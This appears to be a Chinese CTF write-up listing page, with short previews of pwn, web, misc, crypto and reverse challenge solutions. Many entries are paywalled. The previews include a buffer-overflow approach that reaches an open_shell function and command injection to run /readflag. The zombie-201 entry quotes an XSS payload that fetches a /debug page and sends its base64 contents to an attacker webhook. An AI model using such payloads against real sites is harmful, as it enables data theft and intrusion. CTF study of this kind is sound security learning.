-
B0F1-[HackINI-2022]
下载附件,一个无后缀文件,推测一般是linux可执行文件,在kali尝试运行,发现运行逻辑为输入昵称回显昵称启动场景,给了一个nc连接,连接发现运行逻辑与附件相同把程序放进IDA分析,发现主要运行逻辑在say_my_name函数,注意到该函数用了gets函数,同时注意到程序有方法名为open_shell考虑构造缓冲区溢出访问open_shell函数,注意到以下片段s=byteptr-1Chleae...
- PWN
- 1天前
-
Personal_IP_Query-
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 8天前
-
A MISC
爆破压缩包密码得到qwer修改图片高度得到https://pan.baidu.com/s/1cG2QvYy3khpQGLfjfbYevg提取码cavb同样的做法importres=r"from%20t\),([0-9]*),1\)\)=([0-9]*)"pat=re.compile(s)f=open("timu.pcapng","rb")st=f.read().decode("utf-8","ig...
- MISC
- 8天前
-
随便喝WriteUp
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- MISC
- 12天前
-
脚本小子2
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- MISC
- 12天前
-
TAMUctf2019 Science——ssti模板注入
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 14天前
-
随便喝
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- MISC
- 15天前
-
zombie-201
进入题目是这个界面从第一个框传入payload,然后从第二个框中访问,具体如下:1.首先构造payloadfetch('{你的题目地址}/debug').then((response)=>response.text()).then(data=>fetch('{你的webhook地址}?data='+btoa(data)))由于http_only设置为了true,因此不能通过docume...
- WEB
- 19天前
-
SQL注入.2
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 20天前
-
签到题[NCTF - 2018] [WEB]
直接浏览器请求/index.php会自动执行/search/src=https%3A%2F%2Fpic.rmb.bdstatic.com%2Fbjh%2Fuser%2F0b75af50fffda1eaef389f0ef49d1e37.jpeg&refer=http%3A%2F%2Fwww.baidu.com&app=2021&size=r1,1&n=0&g=...
- WEB
- 26天前
-
签到题[miniLCTF-2020] [WEB]
看到首页中system知道a为传入的命令尝试ls/可以得到/下目录尝试执行/readflag显示一个字符串尝试使用cat等读取readflag看是不是正常文件显示乱码,搜索flag没信息,打开源代码查看并搜索flag显示如上一个表达式%d+%d=%d,可能这个readflag是一个交互式二进制文件我们尝试构造语句模拟输入echo-e生成交互式输入表示两个数字结果为100管道|将这些输入传递给/re...
- WEB
- 26天前
-
canary2 wp
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
5 金币
- PWN
- 1月前
-
inspector Challenge Details A baby web challenge
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 1月前
-
shellpong(HackINI-2023)
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Reverse
- 1月前
-
encod3r(HackINI-2023)
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Reverse
- 1月前
-
Night Coder题解
##`NightCoder`题解题目地址:**https://ctf.bugku.com/challenges/detail/id/441.html**题目大意:-给了随机排列后的flag-random种子是时间,提示当时是在2022年某个周四凌晨```importrandomimportdatetimefromsecretimportflag#Imanightcoder,icodedthisat...
- Crypto
- 1月前
-
HaveFun
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- MISC
- 1月前
-
easymisc 二维码识别
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- MISC
- 1月前
-
[NUAACTF-2018]rev
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Reverse
- 1月前
-
[NUAACTF-2022]月色真美
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Reverse
- 1月前
